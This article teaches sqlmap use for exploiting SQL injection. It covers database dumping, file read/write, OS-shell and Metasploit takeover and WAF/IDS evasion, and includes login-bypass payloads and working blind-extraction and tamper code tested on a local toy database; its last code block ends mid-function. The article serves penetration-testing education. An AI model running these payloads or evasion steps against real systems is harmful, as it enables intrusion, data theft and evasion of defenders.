SQL injection attacks remain a significant threat to web applications, and SQLmap is a powerful tool for detecting and exploiting SQL injection vulnerabilities. However, as web application security measures improve, it’s becoming more challenging to successfully exploit SQL injection vulnerabilities using SQLmap. In response, SQLmap offers a range of evasion techniques that can help bypass web application firewalls (WAFs) and other security measures. This article explores some of the most effective SQLmap evasion techniques and provides practical examples of each technique. Additionally, we’ll provide some tips and best practices for using SQLmap evasion techniques safely and ethically. By using these techniques, security professionals can stay one step ahead of attackers and better protect their web applications from SQL injection attacks.

Basic arguments for SQLmap

Generic Arguments:

  • -u <target_URL>: Specify the target URL to test.
  • --batch: Run SQLmap in batch mode (no user interaction).
  • --crawl=<depth>: Crawl the website up to a specified depth.
  • --crawl-exclude=<exclude>: Exclude URLs that match the specified regex pattern.
  • --forms: Test forms for SQL injection.
  • --threads=<threads>: Set the number of threads to be used in the tests.
  • --timeout=<timeout>: Set the request timeout (in seconds).

Retrieve Information Arguments:

  • --current-db: Display the name of the database the application is connected to.
  • --dbms=<DBMS>: Force the back-end DBMS (e.g. MySQL, PostgreSQL, "Microsoft SQL Server") instead of letting sqlmap detect it; useful when detection is ambiguous, harmful when the guess is wrong.
  • --dbs: Enumerate the databases on the server.
  • -D <database_name>: Select the database for the enumeration options that follow.
  • --tables: Enumerate the tables in the selected database.
  • -T <table_name>: Select the table.
  • --columns: Enumerate the columns in the selected table.
  • -C <column_name>[,<column_name>...]: Select the column(s).
  • --dump: Dump the entries of the selected table (or only the selected columns).

Please note that these are just some of the most commonly used arguments in SQLmap, and there are many more advanced arguments available. It is important to use SQLmap with care and only on systems that you have permission to test.

Injection place

From Burp/ZAP capture:

  • -r <request_file>: Load the target request from a file containing the raw HTTP request (save it from Burp's Repeater or ZAP's history); method, headers, cookies and body are all taken from the file. There is no --request-file option.
  • --load-cookies=<filename>: Load cookies from a file in Netscape/wget cookie format.
  • -s <session_file>: Resume an earlier run from its stored .sqlite session file (there is no --load-session option).

GET Request Injection:

  • -u "<target_URL>": Put the parameters in the URL itself (e.g. -u "http://host/page.php?id=1"); sqlmap tests every GET parameter by default. --data is for request bodies, not GET parameters.
  • -p <parameter>: Restrict testing to the named parameter(s), e.g. -p id.

POST Request Injection:

  • -u <target_URL> --data="<body>": Send the parameters in the request body (e.g. --data="user=admin&pass=x"); the presence of --data makes sqlmap use POST.
  • --data="<body>" --method=PUT: Force a different HTTP method for the same body-carrying request.

Injections in Headers and other HTTP Methods:

  • --headers="<headers>" or -H "<header>": Add extra headers to every request (e.g. -H "X-Forwarded-For: 1.2.3.4"). Headers are only tested automatically at higher levels: Cookie from --level 2, User-Agent and Referer from --level 3.
  • --cookie="<cookie>": Set the Cookie header; append * to a value to mark it as the injection point (e.g. --cookie="id=1*"). The same * marker works in -u, --data, --headers and -r files.
  • --method=<METHOD>: Force an arbitrary HTTP method (e.g. --method=TRACE or --method=OPTIONS) while keeping --data as the body.

Indicate string when injection is successful:

  • --string=<string>: Specify a string that indicates successful injection.
  • --not-string=<string>: Specify a string that indicates unsuccessful injection.

Eval:

  • --eval="<python_code>": Evaluate the given Python code before every request, with the request parameters available as variables (e.g. --eval="import hashlib; sig=hashlib.md5(id.encode()).hexdigest()"). This keeps a dependent parameter such as a checksum or anti-tamper token in step with the injected value; it runs on your machine, not in the database.
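
The contract behind --eval, as an added example that is not sqlmap's own code: the helper below reproduces what the option does to one request's parameters (run the code with the parameters as variables, write back every plain-valued variable that changed or is new). How faithfully it mirrors sqlmap's internal implementation is an assumption, and the parameter names id and sig and the MD5 "signature" scheme are made up for illustration.

```python
"""Added example, not sqlmap's own code: what --eval does to a request.

sqlmap's --eval option takes Python code that is executed before every request,
with each request parameter bound to a variable of the same name. After the
code runs, every plain-valued variable that changed or is new is written back
into the request parameters. The helper below reproduces that contract so an
--eval expression can be checked offline; how closely it mirrors sqlmap's own
implementation is an assumption, and the parameter names (id, sig) and the
MD5 "signature" scheme are made up for illustration.
"""
import hashlib
from typing import Dict
from urllib.parse import urlencode

# The string you would pass on the command line as --eval="..." (assumed scheme:
# the application expects sig to be the MD5 of the id parameter).
EVAL_CODE = "import hashlib; sig = hashlib.md5(id.encode()).hexdigest()"


def apply_eval(params: Dict[str, str], code: str) -> Dict[str, str]:
    """Run `code` with `params` as its variables and collect the results.

    Only int/float/str results are written back, so imported modules and other
    scratch objects never leak into the request. Existing parameters are
    updated in place; new ones are appended, as sqlmap appends them.
    """
    scope: Dict[str, object] = dict(params)
    # --eval runs arbitrary Python: this is your own code, never target-controlled.
    exec(code, scope)
    updated: Dict[str, str] = dict(params)
    for name, value in scope.items():
        if name.startswith("__") or not isinstance(value, (int, float, str)):
            continue
        if str(value) != params.get(name):
            updated[name] = str(value)
    return updated


def request_query_string(params: Dict[str, str], code: str) -> str:
    """Build the query string sqlmap would send for one injected request."""
    return urlencode(apply_eval(params, code))
```

Feed it the injected value you expect sqlmap to send (e.g. id set to a boolean-blind payload) and confirm that sig follows; if the application rejects the request anyway, the problem is the scheme, not sqlmap.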

Shell:

  • --os-shell: Prompt for an interactive operating system shell. sqlmap reaches the OS through the injection itself (stacked queries, a UDF library or a web stager written into the document root), so it needs a DBMS account with the matching privileges (e.g. FILE on MySQL, xp_cmdshell rights on SQL Server) and, for the stager route, a writable, known web root.
  • --sql-shell: Prompt for an interactive SQL shell whose statements are run through the injection point.

Read File:

  • --file-read=<remote_path>: Read a file from the database server's file system (e.g. /etc/passwd) through the injection. This needs file-read privileges on the DBMS side (e.g. LOAD_FILE() on MySQL); it does not read "from the database".
  • --file-write=<local_path> --file-dest=<remote_path>: Upload a local file to the given path on the database server.

Crawl a website with SQLmap and auto-exploit:

  • -u <target_URL>: Specify the target URL to test.
  • --crawl=<depth>: Crawl the website up to a specified depth.
  • --batch: Run SQLmap in batch mode (no user interaction).
  • --level=<level>: Set the level of tests to be performed.

Second Order Injection:

  • --second-order=<URL>: Tell sqlmap that the effect of the injection shows up on a different page, and fetch that URL after each request to look for the response. Recent releases name this --second-url, and --second-req=<request_file> lets you supply the second request as a raw HTTP request file. There is no --second-order-test option.

Please note that these are just some of the most commonly used injection places with SQLmap, and there are many more advanced injection techniques available. It is important to use SQLmap with care and only on systems that you have permission to test.

Customizing Injection

Set a Suffix:

  • --suffix=<suffix>: Append a fixed string to every injection payload (not to each parameter), e.g. --suffix="-- -" to comment out the rest of the query, or --suffix=")" when the injected value sits inside parentheses.

Set a Prefix:

  • --prefix=<prefix>: Prepend a fixed string to every injection payload, e.g. --prefix="')" to close a quoted, parenthesised value before the payload runs.

Help Finding Boolean Injection:

  • --technique=B: Restrict sqlmap to the given technique letters (B boolean-based blind, E error-based, U UNION query, S stacked queries, T time-based blind, Q inline queries; default BEUSTQ). T alone is time-based, not boolean.
  • --string=<string>: A string present only in TRUE responses, used to tell the two cases apart.
  • --not-string=<string>: A string present only in FALSE responses.
  • --regexp=<regex> / --code=<HTTP_code>: Match the TRUE case by regular expression or by HTTP status code instead of a fixed string.
  • -p <parameter> / --skip=<parameter>: Test only, or skip, the named parameter(s); --skip takes parameter names, not a number of tests.

Tamper:

  • --tamper=<script>[,<script>...]: Run every payload through the named tamper script(s) from the tamper/ directory before sending it, e.g. --tamper=space2comment,randomcase. Scripts are applied in their declared priority order.
  • --random-agent: Use a randomly chosen User-Agent from sqlmap's list. It does not modify payloads, but it is commonly combined with tampering because the default "sqlmap/<version>" agent is blocked outright by many WAFs.
  • --hex: Use hex conversion while retrieving data, which avoids problems with non-printable characters; it does not obfuscate the payload.
  • space2plus: A tamper script (not a flag; there is no --space-to-plus option) that replaces spaces in the payload with plus signs.

Please note that these are just some of the most commonly used customization options with SQLmap, and there are many more advanced options available. It is important to use SQLmap with care and only on systems that you have permission to test.

Database-specific options

SQLmap provides a number of options that fix or customize its behavior for the back-end DBMS. Some of the most commonly used are:

  1. --dbms=<database>: Force the back-end DBMS instead of letting sqlmap detect it. Supported values include MySQL, PostgreSQL, Oracle, Microsoft SQL Server, SQLite and many others; a version can be appended to the name (e.g. --dbms="MySQL 5.0"). There is no separate --dbms-version option.
  2. --os=<operating_system>: Force the operating system of the database server (Linux or Windows) when sqlmap cannot detect it. This matters for the file-system and OS-command features, whose payloads differ per OS; it does not identify OS-specific vulnerabilities.
  3. --priv-esc: Escalate the privileges of the database process when taking over the host with --os-pwn (it uses Metasploit's getsystem on Windows). It is not a generic "find and exploit a privilege escalation vulnerability" switch.
  4. --dump: Dump the entries of the selected table (-T), optionally only the selected columns (-C). Output is printed and also saved as CSV under sqlmap's output directory.
  5. --tables: List the tables in the selected database (-D), or in all databases if none is selected.
  6. --columns: List the columns of the selected table.
  7. --dump-all: Dump every table in every database; add --exclude-sysdbs to leave out the system databases.

It is important to note that not all database-specific options are applicable to all databases. Additionally, the behavior of SQLmap may differ depending on the database being targeted, even when using the same options. Therefore, it is important to understand the behavior of the DBMS being targeted in order to effectively use SQLmap.

Fingerprinting

Fingerprinting is the process of identifying the type, version, and configuration of the database being targeted. SQLmap provides several options for fingerprinting a database, including:

  1. -f / --fingerprint: Perform an extensive DBMS version fingerprint. Even without it, sqlmap identifies the DBMS and a version range as part of injection detection; this option narrows it down with additional probes.
  2. -b / --banner: Retrieve the DBMS banner (e.g. VERSION() on MySQL, @@VERSION on SQL Server), which usually gives the exact version and often the build's operating system.
  3. --current-user, --current-db, --hostname, --is-dba: Retrieve the database user, the current database, the server hostname and whether the user is a DBA. Together these tell you how far the injection can be pushed (file access and OS features need elevated DBMS privileges).
  4. --dbs: List all databases on the server.
  5. --tables: List the tables of a database (-D).
  6. --columns: List the columns of a table (-D -T).
  7. --search: Search database, table or column names for a given string (e.g. --search -C pass); useful for locating credential tables without dumping everything.
  8. --os=<OS>: Note that this forces the server operating system rather than detecting it; OS detection happens automatically when the file or OS features are used.

Fingerprinting can be a useful first step in the testing process, as it can help identify potential vulnerabilities and guide the testing process. However, it is important to note that some DBMSs may be configured to hide or obscure information about the server, making fingerprinting more difficult. Additionally, fingerprinting should only be performed on systems for which the user has explicit permission to test.

Privilege escalation

Privilege escalation refers to the process of gaining additional privileges on a target system beyond those initially granted to the user. SQLmap provides several options for privilege escalation, including:

  1. --priv-esc: Escalate the privileges of the database process user when taking over the host with --os-pwn, using Metasploit's getsystem on Windows targets. It does not search for privilege escalation vulnerabilities on its own.
  2. --os-cmd=<command> / --os-shell: Run a single OS command, or open an interactive shell, with the privileges of the database process (e.g. the mysql user on Linux, the SQL Server service account on Windows). Requires stacked queries or a writable web root plus the matching DBMS privileges.
  3. --os-pwn: Upload a Metasploit payload through the injection and get a Meterpreter (or VNC) session; point --msf-path at the Metasploit install. The session runs as the database process user, not automatically as an administrator; add --priv-esc to attempt escalation.
  4. --sql-shell: Open an SQL shell through the injection. Useful for enumerating privileges (see also --privileges and --roles) and for DBMS-level escalation such as creating a user or enabling xp_cmdshell when the current user is already a DBA.
  5. --file-write=<local> --file-dest=<remote>: Write a local file to the server (a web shell in the web root, a UDF library). This is what the OS features use under the hood and it needs write privileges such as MySQL's FILE.

It is important to note that privilege escalation should only be attempted on systems for which the user has explicit permission to test. Additionally, it is important to use caution when escalating privileges, as this can potentially cause damage to the system.

Exploitation of other vulnerabilities

Everything sqlmap does after it finds an injection is driven through that injection: there is no mode for exploiting unrelated vulnerability classes. What the options in this area actually provide, by category:

File system access

--file-read=<remote_path>: Read a file from the database server's file system through the SQL injection (LOAD_FILE() on MySQL, pg_read_file() on PostgreSQL). Typical targets are configuration files holding credentials and the application's own source. It needs the DBMS user to hold file-read privileges; it has nothing to do with file inclusion vulnerabilities in the web application.

--file-write=<local_path> --file-dest=<remote_path>: Write a local file to the server, for example a web shell into the document root. On MySQL this needs the FILE privilege and a writable, known web root; on SQL Server it goes through xp_cmdshell.

Cross-site scripting (XSS)

sqlmap has no --xss option and does not test for or exploit XSS. Use a dedicated scanner or manual testing; the only overlap is that data sqlmap dumps or writes may later be rendered by the application.

Operating system command execution

--os-cmd=<command> / --os-shell: Execute commands on the database server with the privileges of the database process. sqlmap builds this on the injection: stacked queries plus xp_cmdshell on SQL Server, a UDF library or an uploaded web stager on MySQL and PostgreSQL. No separate remote code execution or command injection vulnerability is required or used.

--os-pwn: Same route, but the uploaded payload is a Metasploit stager that yields a Meterpreter session; --priv-esc can then be added to attempt privilege escalation.

It is important to note that these features depend on DBMS privileges and server configuration (file privileges, a known web root, stacked queries), so they frequently fail even when the injection itself is solid. As always, only attempt them on systems for which the user has explicit permission to test.

Advanced customization options

SQLmap provides a wide range of advanced customization options, which can be used to fine-tune its behavior and improve its effectiveness. Some of the most useful advanced customization options include:

  1. --threads=<n>: Number of concurrent HTTP requests (default 1, maximum 10). Faster for boolean-based and UNION retrieval; keep it at 1 for time-based blind injection, where parallel requests distort the timing measurements.
  2. --delay=<seconds>: Pause between requests. Slows the scan to stay under rate limits and rate-based detection thresholds.
  3. --random-agent: Pick a random User-Agent from sqlmap's built-in list instead of the default "sqlmap/<version>" header, which many WAFs block outright.
  4. --tor, --tor-type, --check-tor: Route traffic through Tor (SOCKS5 by default) and verify that the Tor exit is actually in use. This hides the source address; it does nothing about the payloads themselves.
  5. --proxy=<proto://host:port>: Send all traffic through a proxy, e.g. --proxy=http://127.0.0.1:8080 to watch every request in Burp; --proxy-cred and --proxy-file are also available.
  6. --tamper=<scripts>: Apply tamper scripts that rewrite each payload to slip past input filters and WAF signatures.
  7. --level=<1-5>: How many payloads and injection points to test (default 1). Level 1 tests GET/POST parameters; level 2 adds cookies, level 3 adds User-Agent and Referer, and higher levels add more payload variants.
  8. --risk=<1-3>: Which potentially harmful payloads to include (default 1). Risk 2 adds heavy time-based tests; risk 3 adds OR-based tests, which can modify data if the injection sits inside an UPDATE or DELETE statement.
  9. --dump-all: Dump every table from every database; use --exclude-sysdbs to skip the system schemas.

It is important to note that these advanced customization options should be used with caution and only by experienced users who understand the potential implications of modifying SQLmap’s behavior.

Authentication bypass

Authentication bypass through SQL injection is the classic login-form attack: if the username or password is concatenated into the login query, a payload such as admin' -- closes the string and comments out the password check, so the query returns the admin row without a valid password. sqlmap has no dedicated bypass option for this. You point it at the login request (-r login.txt, or --data="user=admin&pass=x") and let it detect the injection, then give it --string or --not-string with a fragment of the "logged in" page so it can tell TRUE responses from FALSE ones.

The options whose names contain "auth" do something different: they authenticate sqlmap to the target so that it can reach protected pages at all:

  1. --auth-type=<type>: The HTTP authentication scheme the target uses: Basic, Digest, Bearer, NTLM or PKI.
  2. --auth-cred=<user:password>: The credentials for that scheme (for Bearer, the token).
  3. --auth-file=<file>: The PEM certificate/private key file for PKI authentication.
  4. --cookie="<session cookie>" / --load-cookies=<file>: Reuse a session established by logging in with a browser, which is the usual way to test pages behind a form-based login.

There are no --auth-software or --auth-dbms options, and there is no auth_bypass tamper script. Tamper scripts such as space2hash (MySQL only; replaces spaces with a # comment, a random string and a newline) and randomcase (randomizes keyword case) transform the payload to evade filters in front of the application; they do not bypass authentication by themselves, although they may be needed to get the bypass payload past a WAF.
It’s important to note that while SQLmap can be a powerful tool for bypassing authentication mechanisms, it should only be used for ethical purposes and with the permission of the target organization. Unauthorized access to protected resources can lead to serious legal and ethical consequences.
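
The login-form bypass described above, as an added example that is not part of the original article: the vulnerable login beside the parameterised one, run against a constructed in-memory SQLite users table. The account names, passwords and payloads are made up for the example, and plain SHA-256 stands in for a proper slow password hash only to keep the code short.

```python
"""Added example, not from the original article: the login-query SQL injection
that bypasses authentication, beside the parameterised query that closes it.

The users table, the credentials and the payloads are constructed for this
example and run in an in-memory SQLite database, so it works offline. Password
hashing is plain SHA-256 here purely to keep the example short; a real login
would use a slow, salted password hash.
"""
import hashlib
import sqlite3
from typing import Optional

# Constructed test data: two accounts.
USERS = [("admin", "correct-horse"), ("alice", "hunter2")]


def _hash(password: str) -> str:
    return hashlib.sha256(password.encode()).hexdigest()


def setup_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT PRIMARY KEY, password_hash TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [(u, _hash(p)) for u, p in USERS])
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> Optional[str]:
    """Username is concatenated into the SQL text: this is the injectable login.

    Returns the authenticated username, or None. The password is hashed before
    it reaches the query, so only the username field is injectable here.
    """
    sql = ("SELECT username FROM users WHERE username = '%s' "
           "AND password_hash = '%s'" % (username, _hash(password)))
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_hardened(conn: sqlite3.Connection, username: str, password: str) -> Optional[str]:
    """Same logic with bound parameters: the username can never become SQL."""
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password_hash = ?",
        (username, _hash(password)),
    ).fetchone()
    return row[0] if row else None


# Payloads of the kind a tester (or sqlmap) sends into the username field.
# "admin' -- " closes the string and comments out the password check, so the
# query becomes: ... WHERE username = 'admin' -- ' AND password_hash = '...'
BYPASS_ADMIN = "admin' -- "
# "' OR 1=1 -- " matches every row; whichever comes back first is the victim.
BYPASS_ANY = "' OR 1=1 -- "
```

When you hand this form to sqlmap (--data="username=admin&password=x"), the response difference it needs is the logged-in page versus the error page, which is exactly what --string="Welcome" or --not-string="Invalid" expresses.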

Blind SQL injection

Blind SQL injection is SQL injection where the application never shows query results or database errors in its response, so the attacker can only infer data one yes/no question at a time. The vulnerability is in the application's query construction, not in the DBMS; what is exploited is the difference between the response to a TRUE condition and to a FALSE one, in page content for boolean-based blind and in response time for time-based blind.

SQLmap provides several options for detecting and exploiting blind SQL injection vulnerabilities, including:

  1. --string=<string> / --not-string=<string>: A fragment present only in the TRUE (or only in the FALSE) response. Without it sqlmap compares pages by similarity ratio, which is unreliable on dynamic pages; an explicit marker makes boolean-based detection far more robust.
  2. --prefix=<prefix> / --suffix=<suffix>: Fixed strings wrapped around every payload so that the injected condition lands in a syntactically valid spot (e.g. --prefix="')" --suffix="-- -").
  3. --tamper=<script>: Rewrite payloads to evade input filters or a WAF between sqlmap and the application; the DBMS is not what detects payloads.
  4. --technique=<letters>: Limit sqlmap to specific techniques: B for boolean-based blind, T for time-based blind. Error-based (E) is not blind, since it reads data out of error messages.
  5. --time-sec=<seconds>: How long the time-based payload asks the DBMS to sleep (default 5); lower it on fast, stable links, raise it on noisy ones.

In addition to these options, tamper scripts can rewrite payloads so that they pass input filters and WAF signatures in front of the application. Some relevant scripts:

  1. apostrophemask: Replace apostrophes with their UTF-8 full-width counterpart, which some filters do not recognize as a quote but the application may normalize back.
  2. base64encode: Base64-encode the whole payload; useful only where the application decodes the parameter before building the query.
  3. space2comment: Replace spaces with /**/ comments, defeating signatures that match on whitespace between keywords.

It’s important to note that blind SQL injection attacks can be more difficult to detect and exploit than other types of SQL injection vulnerabilities, and can often require more advanced techniques and tools. It’s also important to ensure that any attempts to exploit blind SQL injection vulnerabilities are done ethically and with the permission of the target organization.

Timing-based SQL injection

Time-based blind SQL injection is the variant used when TRUE and FALSE conditions produce identical responses: the payload asks the DBMS to pause (SLEEP() on MySQL, pg_sleep() on PostgreSQL, WAITFOR DELAY on SQL Server) only when a condition holds, and the attacker reads the answer from the response time. It is the slowest technique and is chosen out of necessity rather than for stealth; a burst of requests that each take exactly n seconds is itself a recognizable pattern.

SQLmap provides several options for detecting and exploiting timing-based SQL injection vulnerabilities, including:

  1. --time-sec=<seconds>: The delay the injected payload asks the DBMS to produce (default 5). sqlmap compares the response time against the baseline it measured to decide TRUE or FALSE; lowering the value speeds up extraction at the cost of more misreadings on jittery links. Keep --timeout comfortably larger than it.
  2. --delay=<seconds> and --threads=1: There is no --time-sec-wait option. Use --delay to space requests out, and keep a single thread for time-based extraction, because concurrent requests inflate each other's response times.
  3. --technique=T: Restrict testing to time-based blind. "Time-based error" is not a technique; error-based (E) is a separate, non-blind technique.

In addition, the same payload-rewriting tamper scripts apply here. There is no sleep tamper script: the delay is part of the time-based payload itself and its length is set with --time-sec. Two scripts frequently combined with time-based tests:

  1. randomcase: Randomize the case of SQL keywords (SeLeCt, sLeEp) to evade case-sensitive signatures; against case-insensitive rules it changes nothing.
  2. space2hash: Replace spaces with a MySQL # comment followed by a random string and a newline. MySQL-only, and useful against filters that key on whitespace between keywords.

It’s important to note that timing-based SQL injection attacks can be more difficult to detect and exploit than other types of SQL injection vulnerabilities, and can often require more advanced techniques and tools. It’s also important to ensure that any attempts to exploit timing-based SQL injection vulnerabilities are done ethically and with the permission of the target organization.
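
The extraction loop behind both blind techniques, as an added example that is not sqlmap's code and serves the preceding two sections: a vulnerable numeric lookup against a constructed in-memory SQLite table, a boolean oracle (the difference --string/--not-string expresses), a time oracle (the difference --time-sec expresses), and the bisection that recovers a secret one character at a time. SQLite has no SLEEP(), so a Python user-defined function named sleep() stands in for the DBMS delay; that substitution, the table, the secret and DELAY are assumptions of the example.

```python
"""Added example, not sqlmap's code: character-by-character extraction through
a boolean-based and a time-based blind oracle, which is how sqlmap's B and T
techniques recover data when nothing from the query is ever displayed.

The vulnerable lookup, its users table and the secret are constructed for this
example and run in an in-memory SQLite database. SQLite has no SLEEP(), so a
Python user-defined function named sleep() stands in for the DBMS delay that
MySQL's SLEEP() or PostgreSQL's pg_sleep() would provide; that substitution is
an assumption of the example, not something sqlmap does.
"""
import sqlite3
import time
from typing import Callable

SECRET = "s3cr3t"   # constructed value the oracle is going to leak
DELAY = 0.1         # seconds: the --time-sec equivalent for this toy target

Oracle = Callable[[str], bool]


def setup_app() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.create_function("sleep", 1, lambda s: time.sleep(s) or 0)
    conn.execute("CREATE TABLE users (id INTEGER, name TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES (1, 'alice', ?)", (SECRET,))
    return conn


def vulnerable_lookup(conn: sqlite3.Connection, user_id: str) -> bool:
    """The injectable query (numeric context, like ?id=1); reveals only found/not."""
    rows = conn.execute("SELECT name FROM users WHERE id = " + user_id).fetchall()
    return bool(rows)


def boolean_oracle(conn: sqlite3.Connection) -> Oracle:
    """TRUE/FALSE is read from the response content (what --string/--not-string compare)."""
    return lambda cond: vulnerable_lookup(conn, "1 AND (%s)" % cond)


def time_oracle(conn: sqlite3.Connection) -> Oracle:
    """TRUE/FALSE is read from how long the response took."""
    def ask(cond: str) -> bool:
        payload = "1 AND (CASE WHEN (%s) THEN sleep(%s) ELSE 0 END) = 0" % (cond, DELAY)
        start = time.monotonic()
        vulnerable_lookup(conn, payload)      # the row comes back either way
        return time.monotonic() - start >= DELAY / 2
    return ask


TARGET = "(SELECT password FROM users WHERE id = 1)"


def bisect(ask: Oracle, expr: str, lo: int, hi: int) -> int:
    """Find the integer value of `expr` in [lo, hi] with one yes/no question per step."""
    while lo < hi:
        mid = (lo + hi) // 2
        if ask("%s > %d" % (expr, mid)):
            lo = mid + 1
        else:
            hi = mid
    return lo


def extract(ask: Oracle, max_len: int = 64) -> str:
    """Recover the secret: first its length, then each character's code point."""
    length = bisect(ask, "length(%s)" % TARGET, 0, max_len)
    chars = []
    for pos in range(1, length + 1):
        # printable ASCII only; sqlmap widens the range when a character falls outside it
        code = bisect(ask, "unicode(substr(%s, %d, 1))" % (TARGET, pos), 32, 126)
        chars.append(chr(code))
    return "".join(chars)
```

Each character costs about seven requests with the boolean oracle and the same number, each up to DELAY seconds long, with the time oracle; that gap is why sqlmap prefers B over T whenever a content difference exists, and why --threads above 1 is only safe for the boolean case.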

Hacking web applications with SQLmap

SQLmap is a powerful tool that can be used to identify and exploit SQL injection vulnerabilities in web applications. By automating the process of detecting and exploiting these vulnerabilities, SQLmap can help security professionals to identify and address potential security weaknesses in their applications.

To use SQLmap to hack a web application, the first step is to identify a target application and determine whether it is vulnerable to SQL injection. This can be done using a variety of techniques, including manual testing, scanning tools, and web proxies like Burp Suite or OWASP ZAP.

Once a vulnerable application has been identified, SQLmap can be used to automate the process of exploiting the SQL injection vulnerability. This typically involves specifying the URL of the vulnerable parameter or input field, and then running SQLmap with the appropriate command line options to detect and exploit the vulnerability.

Some of the key steps involved in using SQLmap to hack a web application include:

  1. Identifying a target application and determining whether it is vulnerable to SQL injection.
  2. Specifying the URL of the vulnerable parameter or input field.
  3. Running SQLmap with the appropriate command line options to detect and exploit the vulnerability.
  4. Identifying and exploiting any additional vulnerabilities or weaknesses in the application, such as file inclusion vulnerabilities or cross-site scripting (XSS) vulnerabilities.
  5. Attempting to escalate privileges or gain access to sensitive data by exploiting weaknesses in the application or the underlying database management system.
  6. Documenting and reporting any vulnerabilities or weaknesses that are discovered, and working with the application owners to address and remediate these issues.

It’s important to note that while SQLmap can be a powerful tool for identifying and exploiting SQL injection vulnerabilities, it should only be used ethically and with the permission of the target organization. Hacking web applications without authorization is illegal and can have serious legal consequences.

SQLmap plugins

sqlmap has no plugin mechanism and no --plugin option; lists of "DUMP*", export and audit plugins that circulate for it describe things that do not exist. What it offers instead:

  1. DBMS support is built in. The per-DBMS code (MySQL, PostgreSQL, Microsoft SQL Server, Oracle, SQLite, IBM DB2, Microsoft Access, Firebird and others) lives under plugins/dbms/ in the source tree and is selected automatically, or forced with --dbms.
  2. Output formats are chosen with --dump-format=CSV|HTML|SQLITE (default CSV); dumped tables are written under the output directory (--output-dir), and --csv-del changes the CSV delimiter. There is no PDF or XML exporter; JSON results are available only through the REST API (sqlmapapi.py).
  3. Tamper scripts under tamper/ are the supported extension point for payload rewriting, loaded with --tamper. You can add your own by dropping a module that defines tamper(payload, **kwargs) into that directory, or by giving --tamper the path to the file.
  4. Auditing of a database's configuration is not a sqlmap feature; what sqlmap enumerates for you are users, password hashes, privileges and roles (--users, --passwords, --privileges, --roles), which is the raw material for such an audit.

SQLmap evasion techniques

SQLmap is a powerful tool for identifying and exploiting SQL injection vulnerabilities, but it’s also important to be able to evade detection by security measures like web application firewalls (WAFs) and intrusion detection systems (IDSs). Here are some SQLmap evasion techniques with practical example code:

  1. Randomization

--random-agent picks a random User-Agent for the session (not random parameter values), which defeats blocking of the default sqlmap/<version> header. --randomize=<param> changes the value of a parameter on every request, which breaks caching and simple repeat-request signatures. Example: sqlmap -u "http://example.com/search.php?q=test&cb=1" --random-agent --randomize=cb

  2. Obfuscation

Tamper scripts rewrite each payload before it is sent, and several can be chained. Example: sqlmap -u "http://example.com/search.php?q=test" --tamper=space2comment,randomcase,between (between replaces > with NOT BETWEEN 0 AND, and = with BETWEEN ... AND ..., for filters that key on comparison operators).

  3. Fragmentation

There are no --max-chars or fragmentation options. The closest sqlmap offers is --chunked, which sends POST bodies with HTTP chunked transfer encoding so that a WAF inspecting the body as one string sees it split up, and --hpp (HTTP parameter pollution), which spreads the payload over repeated parameters where the application concatenates them. Example: sqlmap -u "http://example.com/search.php" --data="q=test" --chunked

  4. Encoding

Encoding is done by tamper scripts: --hex only affects how sqlmap retrieves data, and there is no --unicode option. charencode URL-encodes every character, charunicodeencode uses %uXXXX (for ASP/ASP.NET back ends), and percentage prefixes each character with % for IIS-style decoding. Example: sqlmap -u "http://example.com/search.php?q=test" --tamper=charunicodeencode

  5. Null bytes

--null-connection has nothing to do with null bytes: it tells sqlmap to retrieve only the page length (via HEAD or Range requests) to speed up boolean-based retrieval. Null-byte tricks live in tamper scripts such as apostrophenullencode, which replaces ' with its illegal double-Unicode counterpart %00%27. Example: sqlmap -u "http://example.com/search.php?q=test" --tamper=apostrophenullencode

  6. Delayed injection

--delay pauses between requests to stay under rate limits; --safe-url and --safe-freq send a harmless request every N injected ones so that the session is not flagged for a burst of failures. Example: sqlmap -u "http://example.com/search.php?q=test" --delay=5 --safe-url="http://example.com/" --safe-freq=10

  7. Avoiding detection

--skip-waf only skips sqlmap's own heuristic check for a WAF/IPS (the deliberately malicious probe it sends first); it does not make the traffic less detectable, and --ignore-401 merely stops sqlmap from aborting on HTTP 401 responses. Combine the real evasion options instead. Example: sqlmap -u "http://example.com/search.php?q=test" --skip-waf --ignore-401 --random-agent --delay=2 --tamper=space2comment

These are just a few examples of SQLmap evasion techniques. It’s important to note that these techniques are not foolproof and may not work in all situations. It’s also important to use these techniques responsibly and not use SQLmap to attack systems without permission.
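
A custom tamper script, as an added example that is not sqlmap's own code, serving the Tamper section above, the tamper-script lists in the blind and time-based sections, and the evasion techniques just described. It implements space2comment and randomcase in the shape sqlmap loads (a module exposing tamper(payload, **kwargs)), checks the result against a toy regex filter that stands in for a WAF rule set, and runs both the original and the transformed payload through a constructed SQLite table to show that evasion must preserve the SQL's meaning. The stand-in priority constant, the keyword list, the signature rules and the table are assumptions of the example.

```python
"""Added example, not sqlmap's own code: a custom tamper script in the shape
sqlmap loads (a module exposing tamper(payload, **kwargs)), checked against a
toy signature filter and against a real SQL engine to confirm the transformed
payload still executes.

In a sqlmap checkout the script would live under tamper/, take __priority__
from lib.core.enums.PRIORITY and be selected with --tamper=<name>. The
stand-in priority constant, the keyword list, the three signature rules and
the users table below are assumptions made for this example.
"""
import random
import re
import sqlite3
from typing import List, Optional

__priority__ = 0  # stand-in for lib.core.enums.PRIORITY.LOW

# Keywords whose case is randomized; other identifiers are left alone.
KEYWORDS = {"UNION", "SELECT", "FROM", "WHERE", "AND", "OR", "ORDER", "BY", "NULL"}


def dependencies() -> None:
    """Hook sqlmap calls once when loading the script (used for DBMS warnings)."""


def space2comment(payload: str) -> str:
    """Replace every space outside single quotes with an inline comment."""
    out, in_quotes = [], False
    for ch in payload:
        if ch == "'":
            in_quotes = not in_quotes
        out.append("/**/" if ch == " " and not in_quotes else ch)
    return "".join(out)


def randomcase(payload: str, rng: Optional[random.Random] = None) -> str:
    """Randomize the case of SQL keywords (SeLeCt); identifiers keep their case."""
    rng = rng or random.Random()

    def flip(match: "re.Match[str]") -> str:
        word = match.group(0)
        if word.upper() not in KEYWORDS:
            return word
        return "".join(c.upper() if rng.random() < 0.5 else c.lower() for c in word)

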